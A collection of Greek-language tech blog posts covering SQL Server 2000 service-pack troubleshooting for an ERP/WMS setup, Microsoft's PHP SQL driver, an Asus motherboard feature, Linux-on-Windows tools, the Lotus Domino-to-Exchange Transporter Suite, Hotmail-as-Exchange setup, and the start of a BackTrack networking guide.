    Σκέψη; Εγκατάσταση του Service Pack 4 (πρόταση της εταιρείας με το WMS, σκέψη δική μας η εγκατάσταση του επόμενου διαθέσιμου SP). Αξίζει να σημειωθεί ότι στις ρυθμίσεις του SQL 2000 υπάρχουν δύο πρωτόκολλα επικοινωνίας, το TCP/IP και το named pipes. Με βάση την συγκεκριμένη εγκατάσταση ανακαλύψαμε ότι η εφαρμογή της Singular Logic χρησιμοποιεί κατά κύριο λόγο named pipes, το οποίο το βλέπεις απλά απομακρύνοντας το TCP/IP πρωτόκολλο, όπου η εφαρμογή και πάλι δούλευε, εν αντιθέσει όταν έγινε το αντίστροφο το ERP σταμάτησε να δουλεύει. (εφαρμογή developed 10+ χρόνια πριν)
     
    Μετά από Backup των βάσεων και detach όλων αυτών, γίνεται απεγκατάσταση του SQL 2000 και ξανά εγκατάσταση αυτού ώστε να έχουμε μία 'καθαρή' εγκατάσταση. Στην συνέχεια γίνεται εγκατάσταση του SP4, attach πάλι όλες τις βάσεις και δοκιμές. Όλα παίζουν κανονικά, ακόμα και το telnet.
     
    Συμπέρασμα 1: Σε εγκατάσταση Microsoft SQL Server 2000 χωρίς service packs εγκατεστημένα σε Windows 2003 server, το σύστημα δεν συμπεριφέρεται ορθά. Το ίδιο σενάριο το επιβεβαίωσα και σε Virtual Lab, όπου έχουμε Ping, έχουμε name resolution, δεν έχουμε telnet, δεν έχουμε connection από IIS, δεν έχουμε connection από Windows CE. Με την εγκατάσταση του SP4, η συμπεριφορά έρχεται στα σωστά επίπεδα, όπου όλοι οι τρόποι δοκιμών και επικοινωνίας επιτυγχάνουν.
    ΠΑΡΑΤΗΡΗΣΗ: Κατά την εγκατάσταση του SQL 2000 βγάζει ένα μήνυμα που σε προειδοποιεί ότι για να δουλέψει σωστά θέλει εγκατάσταση από SP3 και άνω. Οπότε καταλαβαίνετε ότι αυτά που αναφέρω, η Microsoft τα γνωρίζει ήδη.
     
    Επόμενο βήμα
    Μετά από όλες τις δοκιμές επικοινωνίας και κάποιων tests στα τερματικά, ξεκίνησε η κανονική λειτουργία του συστήματος WMS μαζί με το ERP και τα PDAs.
    Όλα δούλευαν κανονικά, καθώς η όλη διαδικασία εγίνε Σαββατοκύριακο. Προβλήματα υπήρχαν κάθε τόσο στα pdas που έχαναν τη σύνδεση με το web κομμάτι και διορθωνόταν το πρόβλημα με επανεκκίνηση. Το πρόβλημα που αναφερόταν είχε να κάνει με τα connections στον IIS. Λύση για το συγκεκριμένο ήταν να πάμε στο config αρχείο και να δηλώσουμε να αφήνει όλα τα connections (κακό για το performance) ώστε να γλυτώσουμε χρόνο.
     
    Επόμενο πρόβλημα; Μετά από 3 μέρες συνεχής δουλειάς ένα μήνυμα λάθους πάλι εμφανίστηκε και τα pdas έχασαν επικοινωνία με την βάση. Ούτε με επανεκκινήσεις δούλευε το σύστημα, αλλά μόνο με το να πας πάλι στα πρωτόκολλα επικοινωνίας του SQL 2000 και να αλλάξεις την προτεραιότητα τους και να βάλεις πρώτο το TCP/IP και αποτσεκάρεις το "Force protocol encryption" (αυτό μετά από 3 ημέρες δουλειάς και άλλες 2 ημέρες δοκιμών).
     

     
    Ένα ακόμα λάθος στο σύστημα του WMS λύθηκε με εγκατάσταση ενός νέου IIS πάνω στον SQL server και παραμετροποίηση όλων για να δουλέψει αυτή η αλλαγή.
     
    Στην συνέχεια όλα δουλεύουν κανονικά.
    Όλα; Κάποιες ημέρες μετά το ERP δεν ξεκινάει στους χρήστες. Μετά από έλεγχο παρατηρείται ότι ο διαθέσιμος χώρος στον δίσκο που βρίσκονται οι βάσεις και συγκεκριμένα το log file έχει γεμίσει. Επόμενη παρατήρηση είναι ότι το μέγεθος του Log file της μίας βάσης έχει ξεπεράσει σε μέγεθος την ίδια την βάση. Detach την βάση, σβήσιμο του Log file και ξανά attach με καθαρό log file. Όλα δουλεύουν καλά μέχρι την επόμενη μέρα που το μέγεθος πάλι μεγαλώνει δραματικά και οι καθυστερήσεις στο σύστημα γίνονται καθημερινότητα. Διάφορες δοκιμές μας έδιχναν ποιο είναι το πρόβλημα και το ποιο ουσιαστικό ήταν ότι η βάση δεν μπορούσε να γίνει reindex καθώς όλα τα scheduled jobs απέτυχαν.
     
    Η διαδικασία γνωστή...
    backup τις βάσεις, detach τις βάσεις, uninstall όλου του SQL 2000 μαζί με το SP4, επανεγκατάσταση του SQL 2000 και εγκατάσταση του SP3a.
    Ξανά attach τις βάσεις και όλα τα γνωστά.
    Έκτοτε τα προβλήματα εξαφανίστηκαν.

    Σε αναζήτηση στο Internet θα βρείτε ότι το SP4 έχει πάρα πολλά προβλήματα, σε διάφορες εγκαταστάσεις.
     
    Συμπέρασμα 2: Το Business ERP σε Sql server 2000 παίζει σωστά με Service Pack 3a, σε συνδυασμό με το WMS.

    -------------------
     
    Συνοψίζοντας την παραπάνω ιστορία και ανάλυση και έχοντας μεταφέρει την γνώση αυτή και σε άλλο ένα συνάδελφο που αντιμετώπισε τα ίδια προβλήματα και είδαμε ότι τα προβλήματα του λύθηκαν, θα σημειώσω τις βασικές παρατηρήσεις.
     

    SQL server 2000 σε Windows 2003 server θέλει εγκατάσταση SP (το λέει και η Microsoft) Μακριά από το SP4
    Business ERP και SQL server 2000 θέλει MONO SP3a To SP3a δεν δημιουργεί πρόβλημα ούτε στο σύστημα WMS Μετά την εγκατάσταση του SP3a ελέγξτε τα πρωτόκολλα, ώστε να έχει σαν πρώτο το TCP/IP (και αποτσεκάρετε το force protocoll encryption)
    - Σε περίπτωση προβλημάτων με τα connections σε IIS (η λύση του unlimited connections που εφαρμόσαμε ΔΕΝ ΠΡΟΤΙΝΕΤΑΙ) 
    --------------------
    Δεν ξέρω κατά πόσο θα βοηθήσει κάποιον, αλλά όπως προανέφερα την γνώση αυτή την μοιράστηκα ήδη με ένα συνάδελφο που γλύτωσε πάρα πολύ χρόνο.
    Στην Ελλάδα του σήμερα εγκαταστάσεις Business ERP σε SQL 2000 είναι αρκετές, αλλά και γενικά εγκαταστάσεις SQL 2000 υπάρχουν σε εταιρείες, καλο είναι να έχουμε τα παραπάνω ως βοηθό ή μπούσουλα για την αποφυγή πονοκεφάλων.
     
  19. Blackman
    Όπως αναφέρει το port25, η Microsoft ανακοίνωσε σήμερα στο συνέδριο DrupalConf την Community Technology Preview (CTP) έκδοση του νέου SQL Driver για PHP 2.0 με υποστήριξη για PHP Data Objects.
    Φυσικά αυτό για τους developers είναι ένα μεγάλο βήμα, καθώς θα τους είναι πιο εύκολο να συνδεθούν με τον SQL, καθώς οι περισσότερες (όπως και η νέα έκδοση του Drupal 7) να διαλειτουργήσει (interoperate) ομαλά με τις τελευταίες εκδόσεις του SQL Server.
    Η συγκεκριμένη έκδοση (κάτι σαν τις αντίστοιχες RC) δίνει την δυνατότητα στους χρήστες να δουν το νέο εργαλείο και φυσικά να κάνουν τις παρατηρήσεις τους, ώστε να επηρεάσουν την τελική έκδοση του προγράμματος που θα βγει μετά το δεύτερο μισό αυτού του έτους.

    Προσωπική άποψη είναι ότι με το συγκεκριμένο εργαλείο, ανοίγονται τεράστιοι ορίζοντες για πολλά πράγματα για να γίνουν. Open Source προγράμματα που πλέον μπορούν να συνδεθούν με SQL server (αντί συνήθως με MySQL και άλλες βάσεις) και φυσικά περισσότεροι προγραμματιστές πλέον μπορούν να εκμεταλλευτούν τις δυνατότητες του MS SQL για να πετύχουν το στόχο τους.
    Ένα πρόγραμμα που έχει τέτοια δυνατότητα επιλογής βάσης δεδομένων το κάνει πολύ ευέλικτο στην αγορά και με τον συγκεκριμένο driver η Microsoft κάνει πλέον πολύ δυνατούς τους εκάστοτε PHP developers.
    Για περισσότερες πληροφορίες…
    http://port25.technet.com/archive/2010/04/19/announcing-the-sql-server-driver-for-php-2-0.aspx
    http://blogs.msdn.com/interoperability/archive/2010/04/19/sql-server-driver-for-php-2-0-ctp-adds-php-s-pdo-style-data-access-for-sql-server.aspx
    http://blogs.msdn.com/sqlphp/default.aspx
  20. Blackman
    Πριν λίγες ημέρες έκανα μία αλλαγή στον προσωπικό μου υπολογιστή, αλλάζοντας την Motherboard που είχα με την Asus P5Q Deluxe. H εν λόγω mobo δεν είναι ότι πιο καινούριο (κατασκευάστηκε το 2008), αλλά ήταν πιθανότατα η καλύτερη λύση για να αλλάξω μόνο αυτή και να "κουμπώσω" όλα τα υπόλοιπα ως είχαν.



    Reviews μπορείτε να βρείτε άπειρα στο Internet, αλλά την δουλειά που έχει κάνει η Asus σε ένα συγκεκριμένο κομμάτι είναι όλο το "ζουμί" και αυτό λέγετε ASUS Express Gate.

    ASUS Express Gate

    Αυτό που έχει κάνει η ASUS είναι να ενσωματώνει στην mobo της το Splashtop , μία διανομή LINUX που δίνει την δυνατότητα στον χρήστη να βρεθεί συνδεδεμένος στο Internet σε λιγότερο από 5 δευτερόλεπτα.



    Το λειτουργικό σύστημα περιέχει Firefox, Skype, Pidgin (για να ρυθμίσει ο χρήστης τον αγαπημένο του ΙΜ Messenger, αλλά επίσης και δυνατότητα να δείτε φωτογραφίες από οποιοδήποτε αποθηκευτικό μέσο.

    Το σύστημα επίσης δίνει την δυνατότητα για την σχετική παραμετροποίηση σε θέματα δικτύου (dchp, static ip κλπ) αλλά και μερικών άλλων πραγμάτων.

    Αρκετά εντυπωσιακό, γιατί μιλάμε για ένα σύστημα ουσιαστικά που ακόμα και αν πάθει κάτι το λειτουργικό ή ο δίσκος σας, θα μπορείτε να μπείτε και να δείτε τα email σας ή να κάνετε ότι άλλο θέλετε στο Internet.

    ASUS Mobo (EPU - 6 engine) + Windows Vista (Power Options) = Better Environment

    Ένα επιπλέον χαρακτηριστικό που υπάρχει τουλάχιστον σε αυτή την Mobo, είναι ο τρόπος διαχείρισης του ρεύματος και την κατανάλωσης.



    Το 6 engine αντικατοπτρίζει τα 6 στοιχεία που μπορεί ο χρήστης να ελέγξει μέσω του σχετικού software της Asus μέσα από τα Windows.

    Αυτά είναι:


    Επεξεργαστής
    VGA
    Chipset
    Μνήμη
    Σκληροί δίσκοι
    Ανεμιστήρες


    Μέσω αυτού του συστήματος μπορείτε να ρυθμίσετε αρκετά πράγματα, που βασικό σκοπό έχουν να μειώσουν την κατανάλωση ενέργειας και την μείωση του CO2 που 'βγάζει' το σύστημα προς το περιβάλλον. (υπάρχει και σχετική μέτρηση που μετράει πόσο έχει μειώσει το CO2 που εκπέμπει το σύστημα σε σχέση με την κανονική του λειτουργία).

    Επίσης μέσω αυτού του συστήματος ο χρήστης έχει την δυνατότητα να κάνει και "overclocking" στον επεξεργαστή (η default ρύθμιση στην επιλογή του TURBO είναι +3%, ενώ στο SLOW είναι -1% της ταχύτητας της CPU).

    Οι ρυθμίσεις όπως μπορείτε να δείτε είναι πέντε. Αν όμως κάποιος θέλει να δημιουργήσει και ξεχωριστές ρυθμίσεις θα πρέπει να χρησιμοποιήσει αυτές του συστήματος. Στην περίπτωση των Windows Vista, τα power options (ειδικά οι advanced ρυθμίσεις) επιτρέπουν στον χρήστη να έχει ακόμα καλύτερο ενεργειακό αποτέλεσμα, πάνω στις οποίες ρυθμίσεις έρχεται να προστεθεί και το 6-engine σύστημα.

    ΣΥΜΠΕΡΑΣΜΑ

    Όπως καταλαβαίνετε με όλα τα παραπάνω, οδηγούμαστε όλο και περισσότερο στο σημείο που όλα τα συστήματα (Software & Hardware) θα μπορούν να λειτουργήσουν μεταξύ του και πλεον το Interoperability των συστημάτων εδραιώνεται και πέρα από τη συνεργασία των εφαρμογών ίδιων ή διαφορετικών λειτουργικών συστημάτων.

    Δεν χρειάζετε να σχολιάσω την ευκολία που μου προσφέρει η παραπάνω υλοποίηση της Asus. Επιτέλους μπορώ μένω ήσυχος από τους ενοχλητικούς ανεμιστήρες όταν απλά έχω το PC μου και 'κατεβάζει', αλλά και επίσης και το κλασικό που όταν βιάζεσαι αλλά θες να δεις κάτι γρήγορο στο Internet και δεν μπορείς να περιμένεις 1 λεπτό για να ξεκινήσει όλο το σύστημα σου.
  21. Blackman
    Μέχρι τώρα, πολλοί από εμάς όταν χρειαζόμασταν να τρέξουμε κάποιο άλλο λειτουργικό προχωρούμε στην λύση Virtual Machine. Στο παρελθόν είχα αναφέρει το Wubi, σαν μία λύση εγκατάσταση Ubuntu στα Windows, δίνοντας την ευκολία στο χρήστη του install/uninstall, χωρίς να χρειάζεται να ρυθμίσει κάτι ιδιαίτερο για partitions κλπ. Το συγκεκριμένο μας δίνει full λειτουργικότητα της συγκεκριμένης διανομής, αλλά υστερεί  στο ότι δεν μπορεί να δουλεύει παράλληλα με την Windows εγκατάσταση μας.

    <?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />
     

    Στην αντίθετη περίπτωση των virtual machines, έχουμε άλλα θέματα όπως τους πόρους του συστήματος, τις σχετικές ρυθμίσεις για το δίκτυο και άλλα θέματα που έχουμε όλοι αντιμετωπίσει κατά καιρούς.


     

    Οι παρόντες στο Cybercrime Security Forum που είχε γίνει πέρυσι, θα θυμούνται ότι πολλά από τα εργαλεία που αναφέρθηκαν έτρεχαν κυρίως είτε σε Linux ή σε Macintosh. Οι εναλλακτικές σε windows tools ήταν κατά πολύ περιορισμένες. Προσωπικά στο παρελθόν υπήρξαν στιγμές που χρειάστηκα πραγματικά κάποιο εργαλείο από αυτά που υπάρχουν μόνο σε linux, αλλά δεν μπορούσα να τα τρέξω στο σύστημα μου (αχ αυτό το snort). Η αλήθεια είναι όμως ότι λύσεις υπάρχουν και μιλάμε για λύσεις που μας δίνουν αυτή την δυνατότητα (του να έχουμε linux ή mac tools) μέσα στα windows.

    Μιλάμε για εγκατάσταση προγράμματος, σαν όλα τα υπόλοιπα, αλλά ανεβάζουν την λειτουργικότητα των Windows σε άλλο επίπεδο. Αλλά γιατί να μην σας δείξω κάποιες από αυτές τις εναλλακτικές;


     

    GNU + Cygnus + Windows = CYGWIN (under testing)


    Ανέφερα Cybercrime Security Forum…


    Χμ, πόσοι είδαν το CDάκι που οι ομιλητές μοίρασαν στον κόσμο; Αυτοί που το είδαν, προφανώς ξέρουν ότι εμπεριείχε και το συγκεκριμένο σύστημα. Το Cygwin είναι ένα linux-like περιβάλλον για τα windows και το οποίο προσφέρει μία συλλογή εργαλείων για άμεση χρήση. Όμως μην περιμένετε να δείτε κλασικές εφαρμογές linux να τρέχουν έτσι απλά (σε περίπτωση που δεν εμπεριέχετε). Σε αυτή την περίπτωση αυτό το application θα πρέπει να γίνει rebuild from source για να τρέξει στα Windows (μέσω του Cygwin).


    Γενικά πρέπει να γνωρίζετε τα εξής:

    ·  Cygwin is not a way to run native linux apps on Windows. You have to rebuild your application from source if you want it to run on Windows.


    ·  Cygwin is not a way to magically make native Windows apps aware of UNIX ® functionality, like signals, ptys, etc. Again, you need to build your apps from source if you want to take advantage of Cygwin functionality.


    Τέλος θα πρέπει να ξέρετε ότι το συγκεκριμένο είναι ακόμα σε beta.



    coLinux = Cooperative Linux (tested)


    Άλλη μία αντίστοιχη λύση είναι και το coLinux και μπορεί και συνεργάζετε και με το Cygwin. Στην παρούσα κατάσταση αυτό που δίνει στον χρήστη των windows είναι να λειτουργεί την Ιαπωνέζικη έκδοση του KNOPPIX μέσα από το τρέχον λειτουργικό σύστημα.


     

    andLinux (tested)


    Βασισμένο στο coLinux, αλλά ουσιαστικά τρέχοντας Ubuntu, είναι ίσως η καλύτερη λύση αυτή την στιγμή. Κύριος λόγος δεν είναι άλλος από την ευχρηστία που εμφανίζει το Ubuntu. Τρέχει χωρίς πρόβλημα σε όλα τα συστήματα της Microsoft, συμπεριλαμβανομένων και των Windows 7. Ο μοναδικός περιορισμός που έχει το συγκεκριμένο είναι, εν αντιθέσει με τα προαναφερθέντα, ότι τρέχει ΜΟΝΟ σε 32bit συστήματα.

    Το συγκεκριμένο είναι και το σύστημα που έχω δουλέψει περισσότερο από τα υπόλοιπα και πραγματικά με κάλυψε απόλυτα. Η δυνατότητα της εκτέλεσης του Synaptic και το κατέβασμα και την εγκατάσταση ουσιαστικά ότι προγραμμάτων μπορείτε να φανταστείτε, το έκανε ένα πολύ δυνατό εργαλείο, ειδικότερα με το συνδυασμό των windows. Η δυνατότητα χρήσης διάφορων repositories (aka repos) υπάρχει και στο coLinux, αλλά απλά το Ubuntu έχει μεγαλύτερη γκάμα από το Knoppix.

    Ένα από τα αγαπημένα μου ήταν η χρήση της κονσόλας και έχοντας εγκαταστήσει τα απαραίτητα εργαλεία σε συνδυασμό και τα εργαλεία των windows πχ powershell, sysinternals, η αίσθηση ήταν απερίγραπτη.







     

     

    SoftMac XP Suite version 8.20 (under testing)


    Αυτοί που θέλουν να τρέχουν Macintosh μέσα από τα windows η λύση ακούγετε στον όνομα SoftMac XP Suite. O costasppc πιθανόν να το ξέρει το συγκεκριμένο και θα ήταν ενδιαφέρον αν μπορούσε να εκφέρει γνώμη. Το σύστημα υπάρχει αρκετό καιρό και είναι δοκιμασμένο μέχρι και Windows Vista. Η διαφορά με τις λύσεις linux που αναφέρθηκαν, είναι ότι σε αυτή την περίπτωση μιλάμε για emulator του συστήματος μέσα στα windows.




    Αντίστοιχα με το SoftMac, ρίξτε και μία ματιά στο Basilisk II JIT.


    bochs (not tested)


    Ένας cross-platform emulator που μπορεί να εκτελέσει όλα τα λειτουργικά συστήματα (δεν έχει δοκιμαστεί σε windows 7)






    TopologiLinux (not tested)


    Ένα ακόμα σύστημα, το οποίο είναι ένας συνδυασμός του wubi και του andLinux. Κατά την εγκατάσταση δημιουργείτε ένα μόνο αρχείο, αλλά πλέον το λειτουργικό μπορεί και τρέχει μέσα από τα Windows. Η διαφορά με τo andLinux και η ομοιότητα με το CoLinux είναι ότι το συγκεκριμένο ανοίγει ολόκληρο το περιβάλλον του linux (full desktop). Άλλη διαφορά είναι ότι αυτό είναι βασισμένο στο slackware και δίνει την δυνατότητα στον χρήστη να επιλέξει τον πυρήνα που θέλει να τρέχει το TopologiLinux (X, KDE, Gnome).





    Portable Ubuntu for windows (not tested)


    Η απάντηση στην περίπτωση του wubi και μία άμεση εναλλακτική του andLinux, ακούει στο όνομα Portable Ubuntu. Η διαφορά είναι ότι το συγκεκριμένο παίζει και σε 64bit συστήματα (πράγμα που δεν κάνει το andLinux) και έχει δοκιμαστεί και στα Windows 7.



     









     
    SUA …για να μην ξεχνιόμαστε (tested)


    Μην ξεχνάτε ότι αντίστοιχη λύση προσφέρει και η Microsoft με το Subsystem for UNIX-based Applications, το οποίο είχε παρουσιαστεί από αυτό εδώ το blog. Είναι γραμμή εντολής και δεν δίνει ότι τα προαναφερθέντα, αλλά αν πχ έχετε κάποιο πρόγραμμα από τα γνωστά, τότε δεν θα έχετε πρόβλημα να το τρέξετε μέσω του SUA. Δεν μπορείτε όμως να κάνετε εγκατάσταση (τουλάχιστον προσωπικά δεν βρήκα κάτι), αλλά να κάνετε βασικά πράγματα. Το συγκεκριμένο παίζει σε εκδόσεις ultimate και enterprise.



     

    -----------------------------------------------------------------------------

    Επίλογος

    Αν θέλετε να χρησιμοποιήσετε κάποιο από τα προαναφερθέντα, τότε η επιλογή είναι δική σας, το σίγουρο είναι ότι θα βρείτε αρκετά ενδιαφέρουσα πράγματα με την χρήση των παραπάνω. Απλά να αναφέρω ότι από την προσωπική χρήση είχα κάποια (μικρά) θεματάκια στα Vista και στα 7 με το UAC, αλλά δεν νομίζω να δυσκολευτείτε να τα ξεπεράσετε.

     

    Κατεβάστε τα:

    Cygwin

    CoLinux

    andLinux

    SoftMac XP Suite

    bochs

    TopologiLinux

    Portable Ubuntu

    Subsystem for UNIX-Based Applications (Utilities & SDK) (το βασικό κομμάτι γίνεται εγκατάσταση από τα Windows Features)
  22. Blackman
    ...for Lotus Domino (και όχι μόνο).

    όχι, μην σας μπερδεύει η ονομασία. Δεν μιλάμε για την γνωστή ταινία με τον Jason Statham (μόλις κυκλοφόρησε το 3ο μέρος), αλλά για κάποια εργαλεία της Microsoft που μας δίνουν την δυνατότητα συνύπαρξης Lotus Domino με Active Directory, Exchange Server 2007 και Sharepoint Services 3.0. Το πλήρες όνομα αυτού; Transporter Suite of Tools

    Transporter Suite for Lotus Domino features


    Directory Connector: Συγχρωνίζει χρήστες, groups, και πληροφορίες της βάσης του Domino μεταξύ Windows Active Directory και Lotus Domino Directory
    Free/Busy Connector: Χρησιμοποιείται κατά την παράλληλη χρήση των δύο συστημάτων και επιτρέπει στους χρήστες να δημιουργούν free/busy queries και στους Domino Servers αλλά και στους Exchange 2007 Servers κατά την διαδικασία προγραμματισμού συναντήσεων.
    Directory Migration: Δημιουργεί η ενοποιεί λογαριασμούς Active Directory για χρήστες του Domino
    Group Migration: Δημιουργεί ή ενοποιεί groups του Active Directory με εκείνα του Domino
    Mailbox Migration: 'Μεταφέρει' πληροφορίες από την βάση δεδομένων του Domino σε Exchange 2007 mailboxes
    PAB and Archive Migration: 'Μεταφέρει' όλες τις πληροφορίες από το Personal Address Book και τις προσωπικές archived βάσεις σε mailboxes του Exchange 2007
    Application Migration: 'Μεταφέρει' πληροφορίες από Domino Applications σε Windows Sharepoint Services 3.0 και Office Sharepoint Server 2007
     

    Transporter Suite for Internet Mail

    Ένα επιπλέον χαρακτηριστικό είναι το Transporter Suite for Internet Mail, το οποίο είναι μία συλλογή από εργαλεία που μπορούν να χρησιμοποιηθούν για την 'μεταφορά' POP & IMAP mailboxes σε Microsoft Exchange Server Mailboxes. Οι δυνατότητες που μας δίνονται είναι οι εξής:


    Δυνατότητα 'μεταφοράς' emails, attachments, rich content, calendar items, folders και η διατήρηση ακόμα και της κατάστασης μία πληροφορίας όπως είναι τα read ή τα unread μυνήματα.
    Υποστήριξη επαναφοράς στην προηγούμενη κατάσταση (κάτι σαν... undo του migration)
    'Μεταφορά' συγκεκριμένων items με βάση ημερολογιακού φίλτρου
    Ύπαρξη του Transport Management Console snap in, για να μπορείτε να το διαχειριστείτε μέσω Exchange Management κονσόλας
     

    -------------------

    Για να κάνετε εγκατάσταση τα παραπάνω εργαλεία πρέπει να έχετε τα εξής:


    Windows XP, Vista, 2003 server, 2008 server είτε 32 είτε 64 bit με εγκατεστημένα τα τελευταία updates.
    Microsoft .Net Framework 2.0
    MMC 3.0
    PowerShell 1.0
    Microsoft Exchange Server 2007 SP1 και το Exchange 2007 SP1 Administration Tools (εάν θέλουμε migration σε Exchange)
    Για να γίνει το migration ή για να δουλέψουν παράλληλα τα δύο συστήματα πρέπει να:


    Έχετε το Microsoft Exchange MAPI client and Collaboration Data Objects 1.2.1 για την χρήση του Free/Busy Connector
    Έχετε Lotus Notes 6.x ή 7.0 στον server ή σε τερματικά όπου το Transporter Suite θα εγκατασταθεί (τα Vista υποστηρίζουν εκδόσεις με την έκδοση Lotus Notes 7.x)
    Lotus Domino 6.x, 7.x ή 8.x για παράλληλη χρήση (Interoperability)
    Lotus Domino 5.x, 6.x, 7.x ή 8.x αν θέλουμε απλά να γίνει μεταφορά (Migration)
    Για να δουλέψει ο Directory Connector πρέπει να:


    Γίνει εγκατάσταση του Transport Suite of Tools στον υπολογιστή που τρέχει τον Exchange 2007 και έχει τον ρόλο είτε του Hub Transport,ή  του Mailbox ή και των δύο.
    Στην τοπολογία πρέπει να υπάρχει Exchange 2007 Mailbox server role
    Οι/Ο Domino server που θα συνδεθούν πρέπει να είναι έκδοσης από 6.x και πάνω για να δουλέψουν τα συστήματα παράλληλα
    Για να δουλέψει ο Free/Busy connector πρεπει να:


    Γίνει εγκατάσταση του Transport Suite of Tools στον υπολογιστή που τρέχει τον Exchange 2007 και έχει τον ρόλο είτε του Hub Transport,ή  του Mailbox ή και των δύο.
    Είναι εγκατεστημένος ένας MAPI client στον server
    Ξεκινήσετε τον Lotus Domino Server σαν Windows service (αυτό γίνεται γιατί τα free/busy lookups δεν λειτουργούν σε ένα Domino server που δουλεύει σαν application)
    Γνωρίζετε ότι αν δεν υπάρχει Free/Busy puclic folder θα λάβετε ένα μύνημα λάθους που θα λέει "Cannot find Exchange Server error when trying to create new Free/Busy Connector." Αυτό δεν επιτρέπει τον connector να δημιουργηθεί. Δημιουργήστε έναν Free/Busy public folder πριν προχωρήσετε στην δημιουργία του Free/Busy connector.
    Γνωρίζετε ότι το Transport Suite for Lotus Domino επικοινωνεί με τον Exchange που έχει τον Client Access server role. Αν αυτός ο server έχει και τον ρόλο του Mailbox, τότε ο Free/Busy connector for Lotus Domino ΔΕΝ θα λειτουργεί μέχρι να απενεργοποιηθεί το SSL στο Public virtual directory στον server που έχει και τους δύο ρόλους.

    Κάντε τα εξής για να το απενεργοποιήσετε


    To disable Publicvdir SSL


    1.   Right-click My Computer, select Manage, and then click Internet Information Services (IIS) Manager.

    2.   Navigate to Web Sites/Default Web Site/Public, and then open the Properties dialog box.

    3.   Click the Directory Security tab, and then click Secure Communications Edit.

    4.   Clear the Require secure channel (SSL) option, and then click OK.

    5.   Restart IIS by typing iisreset at the command prompt for this change to take effect.

    Οι/Ο Domino server που θα συνδεθούν πρέπει να είναι έκδοσης από 6.x και άνω για να δουλέψουν τα συστήματα παράλληλα
     

    Για να γίνει το Migration των χρηστών πρέπει να:


    είναι εγκατεστημένη η Exchange Management Console στον server που θα εγκατασταθεί ο Transporter Suite of Tools
    Οι/Ο Domino server που θα συνδεθούν πρέπει να είναι έκδοσης από 6.x και πάνω για να δουλέψουν τα συστήματα παράλληλα
    Για να γίνει το Mail Migration πρέπει να:


    είναι εγκατεστημένη η Exchange Management Console στον server που θα εγκατασταθεί ο Transporter Suite of Tools
    σε περίπτωση που η εγκατάσταση του Transporter Suite of Tools γίνει σε ένα οργανισμό που περιέχει Exchange Servers αυτοί πρέπει να

    έχουν εγκατεστημένο Exchange 2007 SP1
    έχει την έκδοση 5.x και άνω του Lotus Domino εάν θέλουμε να γίνει migration του directory, mailboxes ή applications
    έχετε δικαιώματα για Mailbox migration πριν γίνει το MAIL migration.
    Για να γίνει το Application Migration πρέπει να:


    γίνει εγκατάσταση ο Transporter Suite of Tools στον server που έχει εγκατεστημένο Sharepoint Services 3.0 ή Office Sharepoint Server
    έχει την έκδοση 5.x και άνω του Lotus Domino εάν θέλουμε να γίνει migration του directory, mailboxes ή applications
    Για να γίνει το Group Migration πρέπει να:


    έχει την έκδοση 5.x και άνω του Lotus Domino εάν θέλουμε να γίνει migration του directory, mailboxes ή applications
    Για να γίνει το Notes Mail Archive Migration πρέπει να:


    έχει την έκδοση 5.x και άνω του Lotus Domino εάν θέλουμε να γίνει migration του directory, mailboxes ή applications
    Για να γίνει το Notes PAB Migration πρέπει να:


    έχει την έκδοση 5.x και άνω του Lotus Domino εάν θέλουμε να γίνει migration του directory, mailboxes ή applications
    (οκ...το καταλάβαμε νομίζω)

    --------------

    Εφόσον μάθαμε τι μας προσφέρουν αυτά τα εργαλεία και τι χρειάζεται για να εγκατασταθούν και να δουλέψουν σωστά, όσοι έχουν Lotus Domino στην εταιρεία τους μπορούν πλέον να σκεφτούν την μετάβαση ή την παράλληλη χρήση με Exchange 2007 με πολύ λιγότερες σκοτούρες στο κεφάλι τους.

    Τι λέτε; Αξίζει;

    Download Trasporter Suite of Tools

    ΥΓ. Τα εργαλεία αυτά υπάρχουν από το 2007 (αν θυμάμαι καλά είναι το Transporter for Lotus Domino) και 2008 ( Transporter for Internet Mail )και έχουν φτάσει σε πολύ υψηλό επίπεδο λειτουργίας, ειδικότερα μετά τις τελευταίες αναβαθμίσεις. Υπάρχει δυνατότητα αναβάθμισης προηγούμενης έκδοσης της σουίτας, αλλά υπάρχουν και μερικά 'θεματάκια' τα οποία θα αναφέρω σε άλλο άρθρο σχετικό με τον Transporter.
  23. Blackman
    Επειδή έχω καταλάβει ότι αρκετοί δεν το γνωρίζουν και από συνήθεια ρυθμίζουν το hotmail τους σαν POP3, θα ήθελα να τους ενημερώσω ότι μπορούν να ξεφύγουν από αυτό και να το ρυθμίσουν ως Microsoft Exchange.
    το μοναδικό που πρέπει να βάλετε είναι όταν σας ζητήσει τον server
    m.hotmail.com και το full email account σας στο Username


    στην συνέχεια έχετε πλήρη πρόσβαση στο email σας με όλους τους υποφακέλους και όλη την δομή, καθώς επίσης και αντίστοιχα τις επαφές σας και το ημερολόγιο σας. Συνεπώς τέλος και στα unread emails που ήδη έχετε διαβάσει από τον υπολογιστή σας κλπ.
    Enjoy
  24. Blackman
    Αρχικά να αναφέρουμε ότι το backtrack μπορείτε να το χρησιμοποιήσετε τόσο σαν Live CD ή να δημιουργήσετε ένα Live USB, είτε να το κάνετε εγκατάσταση σε κάποιον υπολογιστή ή laptop, αλλά ακόμα να κατεβάσετε έτοιμο και ένα VMware virtual machine. Όλα αυτά είναι διαθέσιμα στην σελίδα http://www.backtrack-linux.org/downloads/ από όπου μπορείτε να κατεβάσετε αυτό που σας βολεύει καλύτερα.
    Που είναι το δίκτυο μου; Οεο;
    Ένα από τα χαρακτηριστικά που έχει η νέα έκδοση του backtrack είναι ότι το networking του είναι ανενεργό, σαν μία σωστή security πλατφόρμα που σέβεται τον εαυτό της. Αυτός είναι και ο κύριος λόγος που πάρα πολύ κόσμος που δεν είναι εξοικειωμένος με Linux συστήματα το παρατάει όπως το έπιασε. Γιατί πολύ απλά είναι σαν να έχουν ένα αυτοκίνητο και να μην ξέρουν πώς να το ‘βάλουν εμπρός’.
    Στις παλαιότερες εκδόσεις μέχρι και την έκδοση 3, από το networking η κάρτα Ethernet (eth0) ήταν ρυθμισμένη τόσο στο VMware image όσο και στα Live να είναι up and running αυτόματα. Στην νέα έκδοση όμως, παρατήρησα ότι κανένα Interface δεν είναι UP. Στην περίπτωση της ασύρματης κάρτας είναι by default σε κατάσταση monitoring.
    Ethernet & Wireless
